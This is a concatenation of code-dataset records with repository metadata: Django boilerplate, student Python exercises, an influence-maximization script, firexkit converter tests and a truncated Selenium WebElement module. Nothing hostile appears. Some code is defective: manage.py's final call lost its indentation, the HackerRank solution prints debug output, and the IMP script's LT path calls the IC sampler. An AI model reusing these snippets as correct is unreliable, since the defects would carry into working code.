        return succ
| [
"wutiancheng@huawei.com"
] | wutiancheng@huawei.com |
2997d35bb005e1e9c2f3ec505c3b4f4307f92e68 | 8993caba718c1e7478cbbb96f5a7c3b61aa38df8 | /manage.py | 4c68136c02a920fe8cd9d2a32acd88e9d94d29ea | [] | no_license | lsy-GitHub-Vc/automation-maintain-back-end | 3b4bc65d23907e90321a8b80c8751a5f87f1f5f3 | b312b290ef885cd263941b0523898e02f940091b | refs/heads/master | 2023-06-04T22:28:52.730717 | 2021-06-28T09:13:41 | 2021-06-28T09:13:41 | 372,755,960 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 634 | py | #!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
    """Django command-line entry point.

    Points DJANGO_SETTINGS_MODULE at this project's settings (unless already
    set) and hands sys.argv to Django's command dispatcher. Raises a more
    helpful ImportError when Django itself cannot be imported.
    """
    os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'automatization.settings')
    try:
        from django.core.management import execute_from_command_line
    except ImportError as exc:
        raise ImportError(
            "Couldn't import Django. Are you sure it's installed and "
            "available on your PYTHONPATH environment variable? Did you "
            "forget to activate a virtual environment?"
        ) from exc
    execute_from_command_line(sys.argv)
if __name__ == '__main__':
main()
| [
"suliushy@163.com"
] | suliushy@163.com |
2020347cdcc3429271c093e8e7c6ef87a12c5d48 | bd2696ebd08022b8fa126d963661fdf0792e2a0c | /L05_packet_dir/Jobs_from_L05.py | 1fcbf7732bf7deb1924390a45dab7c1a752e924c | [
"MIT"
] | permissive | github-Ilfat/All_Lesson_of_Python | 653d737085c7f1bd381b2d704f280374edeab957 | fbab364fe91e05e08658662b16470a1809b6b2b0 | refs/heads/master | 2021-05-17T15:54:17.353396 | 2020-05-07T14:40:17 | 2020-05-07T14:40:17 | 250,856,289 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 977 | py | # LIGHT:
# Необходимо реализовать модуль divisor_master.
# Все функции модуля принимают на вход натуральные числа от 1 до 1000. Модуль содержит функции:
# 1) проверка числа на простоту (простые числа - это те числа у которых делители единица и они сами);
# 2) выводит список всех делителей числа;
# 3) выводит самый большой простой делитель числа.
# PRO:
# LIGHT +
# 4) функция выводит каноническое разложение числа
# (https://zaochnik.com/spravochnik/matematika/delimost/razlozhenie-chisel-na-prostye-mnozhiteli/) на простые множители;
# 5)функция выводит самый большой делитель (не обязательно простой) числа.
| [
"s-ilfat-h@mail.ru"
] | s-ilfat-h@mail.ru |
da4af6d6fb9bb9553d0b67e9a482b10c829848ca | eb6408409e2ccf7406bd03448aaa8c1c48aafcf0 | /Homework03/work05.py | 2470da240a6df6d850e09c4110fdf727b93b2b3a | [] | no_license | dvo1906/GeekBrainsPY | 734ae4a980a8635187a1dd0acf8cc8c9bff061f5 | ca72ade0bcb3e9b9aaf671e5395a7e323370b358 | refs/heads/master | 2022-12-01T10:58:45.611040 | 2020-08-19T09:14:48 | 2020-08-19T09:14:48 | 281,762,155 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,473 | py | # Задание-5:
# Программа запрашивает у пользователя строку чисел, разделенных
# пробелом. При нажатии Enter должна выводиться сумма чисел.
# Пользователь может продолжить ввод чисел, разделенных пробелом и
# снова нажать Enter. Сумма вновь введенных чисел будет добавляться
# к уже подсчитанной сумме. Но если вместо числа вводится специальный
# символ, выполнение программы завершается. Если специальный символ
# введен после нескольких чисел, то вначале нужно добавить сумму этих
# чисел к полученной ранее сумме и после этого завершить программу.
def my_sum():
    """Interactively accumulate a running sum of integers read from stdin.

    Each input line contains numbers separated by spaces; the running total
    is printed after every line. Entering 'q' or 'Q' stops the loop; numbers
    preceding the quit symbol on the same line are still counted. The final
    total is printed on exit.
    """
    sum_res = 0
    quit_requested = False
    while not quit_requested:
        tokens = input('Input numbers or Q for quit - ').split()
        line_total = 0
        for token in tokens:
            if token.lower() == 'q':
                # Quit symbol: keep what was summed so far on this line.
                quit_requested = True
                break
            line_total += int(token)
        sum_res += line_total
        print(f'Current sum is {sum_res}')
    print(f'Your final sum is {sum_res}')
| [
"dvo1906@gmail.com"
] | dvo1906@gmail.com |
1237eff972e9df2990e7f52be55cc14caec946d7 | 53e8cbc1a18686576ecdfe0b7ab8905fb249560b | /CS303/Project/IMP/IMP.py | 1794c67dd156868c8e99ea35c18eefb5984f5769 | [] | no_license | Reallyee/AI-Notes | fe69bb0926be225895715645a980e4fbb3bf0f71 | 95620c5eb238808194e94395fb6162f33343969f | refs/heads/master | 2021-09-07T08:27:36.872016 | 2018-02-20T08:12:32 | 2018-02-20T08:12:32 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,813 | py | # -*- coding: utf-8 -*-
import numpy as num
import random
import sys
import time
from collections import defaultdict
import argparse
# Stores parent-node -> child-node key/value pairs.
nodes = defaultdict(dict)  # adjacency map: {start: {end: weight, end1: weight1, ...}}
nodes_amount = 0  # number of nodes in the graph
edges_amount = 0  # number of edges in the graph
nodes_set = defaultdict(set)  # start node -> set of its successor nodes
start_time = 0
end_time = -sys.maxint  # Python 2 only (sys.maxint was removed in Python 3)
# 读入文件部分
def open_network_file(filename):
global nodes
global nodes_set
global nodes_amount
global edges_amount
f = open(filename, 'r')
index = 0
for line in f:
if index == 0:
nodes_amount = int(line.split(' ')[0])
edges_amount = int(line.split(' ')[1])
elif index <= edges_amount:
start = int(line.split(' ')[0])
end = int(line.split(' ')[1])
edge_weight = float(line.split(' ')[2])
nodes[start][end] = edge_weight
nodes_set[start].add(end)
# if len(nodes) == 0 or not nodes.has_key(start):
# nodes.update({start:{}})
# nodes[start].update({end: edge_weight})
# else:
# nodes[start].update({end: edge_weight})
index += 1
# def open_seed_file(filename):
# global seed_set
# f = open(filename, 'r')
# for line in f:
# seed_set.append(int(line))
def ise_ic_sample(amount, seed_set):
result_sum = 0
for k in range(0, amount):
nodes_condition = num.zeros(nodes_amount + 1)
activity_set = seed_set
for i in seed_set:
nodes_condition[i] = 1
count = len(activity_set)
while activity_set:
new_activity_set = []
for i in activity_set:
for j in nodes[i]:
if nodes_condition[j] == 0:
probability = random.random()
if probability <= nodes[i][j]:
nodes_condition[j] = 1
new_activity_set.append(j)
count = count + len(new_activity_set)
activity_set = new_activity_set
for i in range(1, nodes_amount + 1):
nodes_condition[i] = 0
result_sum += count
return float(result_sum)/amount
def ise_lt_sample(amount, seed_set):
result_sum = 0
k = 0
while k < amount:
activity_set = seed_set
nodes_condition = num.zeros(nodes_amount+1)
new_weight = num.zeros(nodes_amount+1)
threshold = num.zeros(nodes_amount+1)
for i in seed_set:
nodes_condition[i] = 1
count = len(activity_set)
while activity_set:
new_activity_set = []
for i in activity_set:
for j in nodes[i]:
if nodes_condition[j] == 0:
if threshold[j] == 0:
threshold[j] = random.random()
new_weight[j] += nodes[i][j]
if new_weight[j] > threshold[j]:
nodes_condition[j] = 1
new_activity_set.append(j)
count += len(new_activity_set)
activity_set = new_activity_set
for i in range(1, nodes_amount + 1):
nodes_condition[i] = 0
result_sum += count
k += 1
return float(result_sum)/amount
def imp_parse_command_line():
parser = argparse.ArgumentParser(description="IMP -- Influence Maximization Processor")
parser.add_argument("-i", metavar="<social network>", dest="network", type=str, required=True,
help="the absolute path of the social network file.")
parser.add_argument("-k", metavar="<predefined size of the seed set>", dest="size", type=int, required=True,
help="a positive integer.")
parser.add_argument("-m", metavar="<diffusion model>", dest="model", type=str, required=True,
help="diffusion model which can only be IC or LT.")
parser.add_argument("-b", metavar="<termination type>", dest="termination", type=int, required=True,
help="specifies the termination manner and the value can\
only be 0 or 1. If it is set to 0, the termination condition is as the same\
defined in your algorithm. Otherwise, the maximal time budget specifies\
the termination condition of your algorithm.")
parser.add_argument("-t", metavar="<time budget>", dest="utime", type=int, required=True,
help="a positive number which indicates how many seconds\
(in Wall clock time, range: [60s, 1200s]) your algorithm can spend on\
this instance. If the <termination type> is 0, it still needs to accept -t\
<time budget>, but can just ignore it while estimating.")
parser.add_argument("-r", metavar="<random seed>", dest="rand", type=str, default=None,
help="random seed used in the algorithm")
args = parser.parse_args()
# print args.network, args.size, args.model, args.termination, args.utime, args.rand
if args.termination != 0 and args.termination != 1:
parser.error('argument -b: should be 0 or 1.')
return args.network, args.size, args.model, args.termination, args.utime, args.rand
# def count_dv(node):
# has_count = num.zeros(nodes_amount+1)
# queue = list()
# count = 0
# queue.append(node)
# print node
# while queue:
# node = queue.pop(0)
#
# has_count[node] = 1
# for i in nodes[node]:
# if has_count[i] == 0:
# queue.append(i)
# count += 1
# return count
def ic_model(size, p):
# {v:{{dv: },{tv: },{ddv: }}
set_v = set()
set_s = set()
degree = defaultdict(dict)
global end_time
for i in nodes.keys():
# number = count_dv(i)
degree[i]["dv"] = len(nodes[i])
degree[i]["tv"] = 0
degree[i]["ddv"] = len(nodes[i])
set_v.add(i)
print set_v
k = 0
while end_time-start_time <= u_time-3 and k<size :
max_num = 0
vertex = None
for element in set_v:
if degree[element]["ddv"] > max_num:
max_num = degree[element]["ddv"]
vertex = element
set_s.add(vertex)
print vertex
set_v.remove(vertex)
for element in nodes[vertex]:
if element in degree:
dv = degree[element]["dv"]
degree[element]["tv"] = len(nodes_set[element]&set_s)
tv = degree[element]["tv"]
degree[element]["ddv"] =2*tv+(dv-tv)*tv*p
if termination == 1:
end_time = time.time()
k += 1
return set_s
def lazy_forward(k, model_type, sample_type):
new_seed_set = set()
vertex_set = set()
cost_function = {}
cur_s = {}
global end_time
for i in nodes:
if nodes[i]:
vertex_set.add(i)
cost_function.update({i: sys.maxint})
cur_s.update({i: sys.maxint})
while len(new_seed_set)+1 <= k and end_time-start_time <= u_time-3:
for s in vertex_set - new_seed_set:
cur_s[s] = 0
combine_set_a = []
for s in new_seed_set:
combine_set_a.append(s)
if sample_type == "IC":
round_test = ise_ic_sample(1000, combine_set_a)
else:
round_test = ise_lt_sample(1000,combine_set_a)
while 1:
max_value = -sys.maxint
seed_star = None
for s in vertex_set - new_seed_set:
if model_type == "UC":
if max_value<cost_function[s]:
max_value = cost_function[s]
seed_star = s
if model_type == "CB":
if max_value < cost_function[s]/(len(nodes[s])+1):
max_value = cost_function[s]
seed_star = s
if cur_s[seed_star] == 1:
new_seed_set.add(seed_star)
vertex_set.remove(seed_star)
break
else:
combine_set = []
for i in new_seed_set:
combine_set.append(i)
combine_set.append(seed_star)
if sample_type == "IC":
cost_function[seed_star] = ise_ic_sample(1000, combine_set) - round_test
cur_s[seed_star] = 1
else:
cost_function[seed_star] = ise_lt_sample(1000, combine_set) - round_test
cur_s[seed_star] = 1
if termination ==1:
end_time = time.time()
seed_set = []
for i in new_seed_set:
seed_set.append(i)
return seed_set
def cost_effective_lazy_forward(k, sample_type):
seed_set1 = lazy_forward(k, "UC", sample_type)
seed_set2 = lazy_forward(k ,"CB", sample_type)
if sample_type == "IC":
result1 = ise_ic_sample(10000, seed_set1)
result2 = ise_ic_sample(10000, seed_set2)
if result1 > result2:
return seed_set1
else:
return seed_set2
if sample_type == "LT":
result1 = ise_ic_sample(10000, seed_set1)
result2 = ise_ic_sample(10000, seed_set2)
if result1 > result2:
return seed_set1
else:
return seed_set2
if __name__ == "__main__":
network, size, model, termination, u_time, rand = imp_parse_command_line()
open_network_file(network)
random.seed(rand)
if termination == 1:
start_time = time.time()
if edges_amount>1000:
get_seed_set = ic_model(size, 0.01)
else:
get_seed_set = cost_effective_lazy_forward(size, model)
for get_seed in get_seed_set:
print get_seed
else:
end_time = -sys.maxint
start_time = 0
get_seed_set = cost_effective_lazy_forward(size, model)
for get_seed in get_seed_set:
print get_seed
# open_network_file("C:\Users\THINKPAD\PycharmProjects\IMP\AI_IMP\AI_IMP\\network.txt")
# print nodes
# termination = 0
# u_time = sys.maxint
# seed_set = ic_model(4, 0.01)
# print ise_lt_sample(1000, seed_set)
| [
"noreply@github.com"
] | Reallyee.noreply@github.com |
7b4a7d4f9d50c3b15fdcdad534c4dc1667e58609 | 22979cf58a2cc0059c4d9bbee4c53c7303f0e88c | /tests/unit_tests/argument_conversion_tests.py | d49ac6d75b9dba22e84e6c58f453dcc3c78ccfb0 | [
"BSD-3-Clause"
] | permissive | FireXStuff/firexkit | 5477baeceeee8c8a6b4ee03408827e6d6ad08f41 | a2f2565ae9fdfda5463c0b86aa5a2ec112740f17 | refs/heads/master | 2023-08-19T08:50:55.574486 | 2023-08-16T00:31:45 | 2023-08-16T00:31:45 | 165,108,555 | 3 | 0 | NOASSERTION | 2022-01-06T22:28:44 | 2019-01-10T18:12:47 | Python | UTF-8 | Python | false | false | 11,473 | py |
import unittest
from celery import Celery
from firexkit.argument_conversion import ConverterRegister, CircularDependencyException, \
MissingConverterDependencyError, ConverterRegistrationException, NameDuplicationException, SingleArgDecorator, \
ArgumentConversionException
from firexkit.task import FireXTask
class ArgConversionTests(unittest.TestCase):
def test_converter_registration(self):
test_input_converter = ConverterRegister()
@test_input_converter.register
def converter_no_dependency(kwargs):
kwargs['converter_no_dependency'] = True
return kwargs
@test_input_converter.register('converter_no_dependency')
def converter_str_dependency(kwargs):
kwargs['converter_str_dependency'] = True
return kwargs
@test_input_converter.register('converter_no_dependency',
'converter_str_dependency')
def converter_list_dependency(kwargs):
kwargs['converter_list_dependency'] = True
return kwargs
converted = test_input_converter.convert(**{})
self.assertTrue('converter_no_dependency' in converted)
self.assertTrue('converter_str_dependency' in converted)
self.assertTrue('converter_list_dependency' in converted)
with self.assertRaises(MissingConverterDependencyError):
@test_input_converter.register('Nope')
def missing_dependent(_):
# Should not reach here
pass # pragma: no cover
test_input_converter.convert(**{})
def test_converter_dependency(self):
unit_test_obj = self
test_input_converter = ConverterRegister()
@test_input_converter.register
def converter_one(kwargs):
kwargs['converter_one'] = True
return kwargs
@test_input_converter.register('converter_one')
def converter_two(kwargs):
unit_test_obj.assertTrue('converter_one' in kwargs)
kwargs['converter_two'] = True
return kwargs
@test_input_converter.register('converter_four')
def converter_three(kwargs):
unit_test_obj.assertTrue('converter_four' in kwargs)
kwargs['converter_three'] = True
return kwargs
@test_input_converter.register
def converter_four(kwargs):
kwargs['converter_four'] = True
return kwargs
############################
# test multiple dependencies
@test_input_converter.register('converter_one',
'converter_two',
'converter_three',
'converter_four')
def converter_five(kwargs):
unit_test_obj.assertTrue('converter_one' in kwargs)
unit_test_obj.assertTrue('converter_two' in kwargs)
unit_test_obj.assertTrue('converter_three' in kwargs)
unit_test_obj.assertTrue('converter_four' in kwargs)
return kwargs
test_input_converter.convert(**{})
#######################################
# test detection of circular dependency
test_input_converter = ConverterRegister()
with self.assertRaises(CircularDependencyException):
@test_input_converter.register('converter_seven')
def converter_six(_):
# Should not reach here
pass # pragma: no cover
@test_input_converter.register('converter_eight')
def converter_seven(_):
# Should not reach here
pass # pragma: no cover
@test_input_converter.register('converter_six')
def converter_eight(_):
# Should not reach here
pass # pragma: no cover
test_input_converter.convert(**{})
################################
# test unrecognized dependencies
test_input_converter = ConverterRegister()
with self.assertRaises(MissingConverterDependencyError):
@test_input_converter.register("this_is_not_valid")
def converter_unrecognised(_):
pass # Should not reach here # pragma: no cover
test_input_converter.convert(**{})
#####################################################
# test in combination with boolean to indicate pre or post task
test_input_converter = ConverterRegister()
@test_input_converter.register(True)
def converter_nine(kwargs):
kwargs['converter_nine'] = True
@test_input_converter.register(False)
def converter_ten(kwargs):
kwargs['converter_ten'] = True
@test_input_converter.register(False, "converter_ten")
def converter_eleven(kwargs):
kwargs['converter_eleven'] = True
unit_test_obj.assertTrue('converter_ten' in kwargs)
@test_input_converter.register("converter_eleven", False, "converter_ten")
def converter_twelve(kwargs):
unit_test_obj.assertTrue('converter_ten' in kwargs)
unit_test_obj.assertTrue('converter_eleven' in kwargs)
test_input_converter.convert(**{})
test_input_converter.convert(pre_task=False, **{})
#####################################################
# test pre cannot be dependant on post
test_input_converter = ConverterRegister()
@test_input_converter.register(True)
def converter_thirteen(kwargs):
kwargs['converter_thirteen'] = True
# post can be dependant on pre
@test_input_converter.register(False, "converter_thirteen")
def converter_fourteen(kwargs):
unit_test_obj.assertTrue('converter_thirteen' in kwargs)
kw = test_input_converter.convert(pre_task=True, **{})
test_input_converter.convert(pre_task=False, **kw)
@test_input_converter.register(True, "converter_fourteen")
def converter_fifteen(_):
# Should not reach here
pass # pragma: no cover
with self.assertRaises(MissingConverterDependencyError):
test_input_converter.convert(pre_task=True, **{})
#####################################################
# test pre cannot be dependant on post
test_input_converter = ConverterRegister()
with self.assertRaises(CircularDependencyException):
@test_input_converter.register("converter_sixteen")
def converter_sixteen(_):
# Should not reach here
pass # pragma: no cover
test_input_converter.convert(pre_task=True, **{})
def test_exclude_indirect_args(self):
test_input_converter = ConverterRegister()
@test_input_converter.register(True)
def no_indirect(kwargs):
# indirect args should not be passed to converters
self.assertTrue("excluded" not in kwargs)
self.assertTrue("ignored" in kwargs)
self.assertTrue(kwargs["included"])
kw = test_input_converter.convert(pre_task=True,
**{
"excluded": "@included",
"included": True,
"ignored": "anything",
})
self.assertTrue("excluded" in kw)
self.assertTrue("included" in kw)
self.assertTrue("ignored" in kw)
# single arg converter redundantly filters @indirect
@SingleArgDecorator("filter")
def boom(_):
raise Exception("Test Fail") # pragma: no cover
boom({"filter": "@ya"})
def test_failing_converters(self):
test_app = Celery()
@test_app.task(base=FireXTask)
def a_task():
# Should not reach here
pass # pragma: no cover
with self.assertRaises(ConverterRegistrationException):
# no Function provided
ConverterRegister.register_for_task(a_task)(None)
test_input_converter = ConverterRegister()
with self.assertRaises(ConverterRegistrationException):
# no arguments provided
test_input_converter.register()
test_input_converter = ConverterRegister()
with self.assertRaises(ConverterRegistrationException):
@test_input_converter.register(True, {}) # bad type
def go_boom(_):
# Should not reach here
pass # pragma: no cover
class TestException(Exception):
pass
@test_input_converter.register
def go_boom(_):
raise TestException()
with self.assertRaises(TestException):
test_input_converter.convert()
with self.assertRaises(NameDuplicationException):
# register the same thing a second time
@test_input_converter.register
def go_boom(_):
# Should not reach here
pass # pragma: no cover
with self.assertRaises(NameDuplicationException):
test_input_converter._check_not_registered("go_boom", {"go_boom": go_boom})
def test_single_arg_converter(self):
test_input_converter = ConverterRegister()
@test_input_converter.register
@SingleArgDecorator("hit_this", "this_is_not_there", "skip_this")
def flip(arg_value):
return not arg_value
@test_input_converter.register
@SingleArgDecorator("ya no")
def nope(_):
return None
data = {
"hit_this": False,
"skip_this": "@hit_this",
"do_not_hit_this": False,
"ya no": "yes"
}
result = test_input_converter.convert(**data)
self.assertTrue(result["hit_this"])
self.assertFalse(result["do_not_hit_this"])
self.assertTrue("this_is_not_there" not in result)
self.assertTrue(result["skip_this"] == "@hit_this")
self.assertIsNone(result["ya no"])
@test_input_converter.register
@SingleArgDecorator("match")
def go_boom(_):
raise NotImplementedError("Go boom")
with self.assertRaises(ArgumentConversionException):
test_input_converter.convert(**{"match": True})
with self.assertRaises(ConverterRegistrationException):
@test_input_converter.register
@SingleArgDecorator
def forgot_brackets(_):
pass # pragma: no cover
with self.assertRaises(ConverterRegistrationException):
@test_input_converter.register
@SingleArgDecorator()
def forgot_the_arg(_):
pass # pragma: no cover
def test_append_to_single_arg_converter(self):
test_input_converter = ConverterRegister()
@test_input_converter.register
@SingleArgDecorator("initial_arg")
def flip(arg_value):
return not arg_value
flip.append("dynamic_arg")
data = {
"initial_arg": False,
"dynamic_arg": False
}
result = test_input_converter.convert(**data)
self.assertTrue(result["initial_arg"])
self.assertTrue(result["dynamic_arg"])
| [
"mdelahou@cisco.com"
] | mdelahou@cisco.com |
9545d7256754ef0710c102831768350d3f6fa5b7 | 2e9c62790b162adc6e68a8012227a1b66b82b7b2 | /HackerRank/Contest/swapping_in_the_array.py | b3106fb299a6b21fdb53d6cac22e7c3bd77ab4b1 | [] | no_license | pandeynandancse/Compeitive-programming-solutions | a2756d5f9d7acc24ec67586339b53f65ee69d5e1 | 339a4e86635842d26c3dc507dff916d18ae981a3 | refs/heads/master | 2020-03-31T18:59:51.084045 | 2018-10-13T14:46:11 | 2018-10-13T14:46:11 | 152,481,048 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 752 | py | #!/bin/python3
import math
import os
import random
import re
import sys
# Complete the swapToSort function below.
def swapToSort(a):
# Return -1 or 0 or 1 as described in the problem statement.
z=sorted(a)
count = 0
if z == a:
return 0
if z != a :
print(len(z))
for i in range(len(z)):
if z[i]==a[i]:
continue
else:
count = count + 1
if count == 2:
return 1
else:
return -1
if __name__ == '__main__':
fptr = open(os.environ['OUTPUT_PATH'], 'w')
n = int(input())
a = list(map(int, input().rstrip().split()))
result = swapToSort(a)
print(result)
fptr.write(str(result) + '\n')
fptr.close()
| [
"noreply@github.com"
] | pandeynandancse.noreply@github.com |
461fa08a7e9956a25c3151e5bda3ad53bd073017 | 87aeeaeba71d68a2056c6479b406e73a688b7a1c | /blog/migrations/0005_auto_20200325_1113.py | fec8bef8102be301d9a47576f8c95cd9217108e3 | [] | no_license | dhrvjha/marena | 2376d5e4c45af7377faaf4fe5ecf4f5725e9eb0a | 7c2ff6cb102770bc6ba6e6534143055071cd1439 | refs/heads/master | 2022-06-22T01:56:25.017241 | 2020-05-06T20:15:30 | 2020-05-06T20:15:30 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 395 | py | # Generated by Django 3.0.3 on 2020-03-25 05:43
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('blog', '0004_auto_20200322_2227'),
]
operations = [
migrations.AlterField(
model_name='posts',
name='date_posted',
field=models.DateTimeField(auto_now_add=True),
),
]
| [
"kdhruv71@gmail.com"
] | kdhruv71@gmail.com |
63af9fa38e554698f98f4907faea4df374a1800d | 2bd6e4ab766157c490c829ed4b4ef6793cd43a09 | /__init__.py | 426b755f2c03d771cf3f56da6fb43ae623f9b34e | [] | no_license | ddd1020/runner | e1881a52dbcef4a311f8f15dba9365d88e74edb5 | 29e9a86dbe14ebfec77192e96886e7e80a89ee2b | refs/heads/master | 2021-07-25T17:47:02.414805 | 2017-11-06T00:23:52 | 2017-11-06T00:23:52 | 109,626,977 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 36 | py | from tasks import process_data_task
| [
"dauren@gmail.com"
] | dauren@gmail.com |
60a0c595182335ceb7d34ad2e2e8f0333bfdddbe | dbb3142ded7dcfd671678161a0354923641320d4 | /tools/other_library/selenium/webdriver/remote/webelement.py | c786d1d99ab81ee24c7bfa177380c9412ddb05d9 | [] | no_license | l15892531078/Venus_test | 8531d4ac2d27cfd09bd9cdd7dc6a492eca4f4aba | 62eb7752dc3859a1096607b64e2a4ebf21eca1d4 | refs/heads/master | 2022-12-19T10:16:42.049242 | 2020-09-20T06:04:29 | 2020-09-20T06:04:29 | 297,006,509 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 23,793 | py | # Licensed to the Software Freedom Conservancy (SFC) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The SFC licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import base64
import hashlib
import os
import pkgutil
import warnings
import zipfile
from Venus.tools.other_library.selenium.common.exceptions import WebDriverException
from Venus.tools.other_library.selenium.webdriver.common.by import By
from Venus.tools.other_library.selenium.webdriver.common.utils import keys_to_typing
from Venus.tools.other_library.selenium.webdriver.remote.command import Command
# Python 2/3 compatibility shims.
try:
    # Python 2: rebind ``str`` to ``basestring`` so string checks in this
    # module accept both ``str`` and ``unicode`` values.
    str = basestring
except NameError:
    # Python 3: ``basestring`` no longer exists; the builtin ``str`` suffices.
    pass

try:
    from StringIO import StringIO as IOStream
except ImportError:  # 3+
    from io import BytesIO as IOStream
# Derive the package name that bundles the JavaScript "atoms" loaded below.
# Not relying on __package__ here as it can be `None` in some situations (see #4558).
_pkg = '.'.join(__name__.split('.')[:-1])
# Browser-independent JavaScript snippets shipped next to this module; they are
# injected into the page to emulate getAttribute/isDisplayed where the remote
# end does not provide the behaviour itself.
getAttribute_js = pkgutil.get_data(_pkg, 'getAttribute.js').decode('utf8')
isDisplayed_js = pkgutil.get_data(_pkg, 'isDisplayed.js').decode('utf8')
class WebElement(object):
    """Represents a DOM element.

    Generally, all interesting operations that interact with a document will be
    performed through this interface.

    All method calls will do a freshness check to ensure that the element
    reference is still valid.  This essentially determines whether or not the
    element is still attached to the DOM.  If this test fails, then a
    ``StaleElementReferenceException`` is thrown, and all future calls to this
    instance will fail."""
    def __init__(self, parent, id_, w3c=False):
        """Create a handle to a remote DOM element.

        :Args:
         - parent - the WebDriver instance this element belongs to.
         - id_ - the opaque element reference assigned by the remote end.
         - w3c - True when the session speaks the W3C WebDriver protocol,
           False for the legacy JSON wire protocol.
        """
        self._parent = parent
        self._id = id_
        self._w3c = w3c
    def __repr__(self):
        # Include both the session id and the remote element reference so the
        # repr is useful when debugging stale-element problems.
        return '<{0.__module__}.{0.__name__} (session="{1}", element="{2}")>'.format(
            type(self), self._parent.session_id, self._id)
@property
def tag_name(self):
"""This element's ``tagName`` property."""
return self._execute(Command.GET_ELEMENT_TAG_NAME)['value']
@property
def text(self):
"""The text of the element."""
return self._execute(Command.GET_ELEMENT_TEXT)['value']
    def click(self):
        """Click this element via the remote end."""
        self._execute(Command.CLICK_ELEMENT)
    def submit(self):
        """Submit the form this element belongs to.

        W3C remote ends have no dedicated "submit" endpoint, so in that case
        the ancestor ``<form>`` is located and a synthetic ``submit`` event is
        dispatched to it (falling back to ``form.submit()`` when no listener
        cancels the event).  Legacy remote ends handle submission natively.
        """
        if self._w3c:
            form = self.find_element(By.XPATH, "./ancestor-or-self::form")
            self._parent.execute_script(
                "var e = arguments[0].ownerDocument.createEvent('Event');"
                "e.initEvent('submit', true, true);"
                "if (arguments[0].dispatchEvent(e)) { arguments[0].submit() }", form)
        else:
            self._execute(Command.SUBMIT_ELEMENT)
    def clear(self):
        """Clear the element's value if it is a text entry element."""
        self._execute(Command.CLEAR_ELEMENT)
    def get_property(self, name):
        """
        Gets the given property of the element.

        :Args:
            - name - Name of the property to retrieve.

        Example::

            text_length = target_element.get_property("text_length")
        """
        try:
            return self._execute(Command.GET_ELEMENT_PROPERTY, {"name": name})["value"]
        except WebDriverException:
            # The remote end predates the getElementProperty endpoint; emulate
            # the lookup with a JavaScript property access instead.
            return self.parent.execute_script('return arguments[0][arguments[1]]', self, name)
    def get_attribute(self, name):
        """Gets the given attribute or property of the element.

        This method will first try to return the value of a property with the
        given name. If a property with that name doesn't exist, it returns the
        value of the attribute with the same name. If there's no attribute with
        that name, ``None`` is returned.

        Values which are considered truthy, that is equals "true" or "false",
        are returned as booleans. All other non-``None`` values are returned
        as strings. For attributes or properties which do not exist, ``None``
        is returned.

        :Args:
            - name - Name of the attribute/property to retrieve.

        Example::

            # Check if the "active" CSS class is applied to an element.
            is_active = "active" in target_element.get_attribute("class")
        """
        attributeValue = ''
        if self._w3c:
            # W3C remote ends do not implement the property-then-attribute
            # fallback, so run the bundled getAttribute atom in the page.
            attributeValue = self.parent.execute_script(
                "return (%s).apply(null, arguments);" % getAttribute_js,
                self, name)
        else:
            resp = self._execute(Command.GET_ELEMENT_ATTRIBUTE, {'name': name})
            attributeValue = resp.get('value')

            if attributeValue is not None:
                # Normalize boolean-ish attribute values (except 'value', whose
                # literal text must be preserved) to lowercase 'true'/'false'.
                if name != 'value' and attributeValue.lower() in ('true', 'false'):
                    attributeValue = attributeValue.lower()

        return attributeValue
def is_selected(self):
"""Returns whether the element is selected.
Can be used to check if a checkbox or radio button is selected.
"""
return self._execute(Command.IS_ELEMENT_SELECTED)['value']
def is_enabled(self):
"""Returns whether the element is enabled."""
return self._execute(Command.IS_ELEMENT_ENABLED)['value']
def find_element_by_id(self, id_):
"""Finds element within this element's children by ID.
:Args:
- id\_ - ID of child element to locate.
:Returns:
- WebElement - the element if it was found
:Raises:
- NoSuchElementException - if the element wasn't found
:Usage:
foo_element = element.find_element_by_id('foo')
"""
return self.find_element(by=By.ID, value=id_)
def find_elements_by_id(self, id_):
"""Finds a list of elements within this element's children by ID.
Will return a list of webelements if found, or an empty list if not.
:Args:
- id\_ - Id of child element to find.
:Returns:
- list of WebElement - a list with elements if any was found. An
empty list if not
:Usage:
elements = element.find_elements_by_id('foo')
"""
return self.find_elements(by=By.ID, value=id_)
def find_element_by_name(self, name):
"""Finds element within this element's children by name.
:Args:
- name - name property of the element to find.
:Returns:
- WebElement - the element if it was found
:Raises:
- NoSuchElementException - if the element wasn't found
:Usage:
element = element.find_element_by_name('foo')
"""
return self.find_element(by=By.NAME, value=name)
def find_elements_by_name(self, name):
"""Finds a list of elements within this element's children by name.
:Args:
- name - name property to search for.
:Returns:
- list of webelement - a list with elements if any was found. an
empty list if not
:Usage:
elements = element.find_elements_by_name('foo')
"""
return self.find_elements(by=By.NAME, value=name)
def find_element_by_link_text(self, link_text):
"""Finds element within this element's children by visible link text.
:Args:
- link_text - Link text string to search for.
:Returns:
- WebElement - the element if it was found
:Raises:
- NoSuchElementException - if the element wasn't found
:Usage:
element = element.find_element_by_link_text('Sign In')
"""
return self.find_element(by=By.LINK_TEXT, value=link_text)
def find_elements_by_link_text(self, link_text):
"""Finds a list of elements within this element's children by visible link text.
:Args:
- link_text - Link text string to search for.
:Returns:
- list of webelement - a list with elements if any was found. an
empty list if not
:Usage:
elements = element.find_elements_by_link_text('Sign In')
"""
return self.find_elements(by=By.LINK_TEXT, value=link_text)
def find_element_by_partial_link_text(self, link_text):
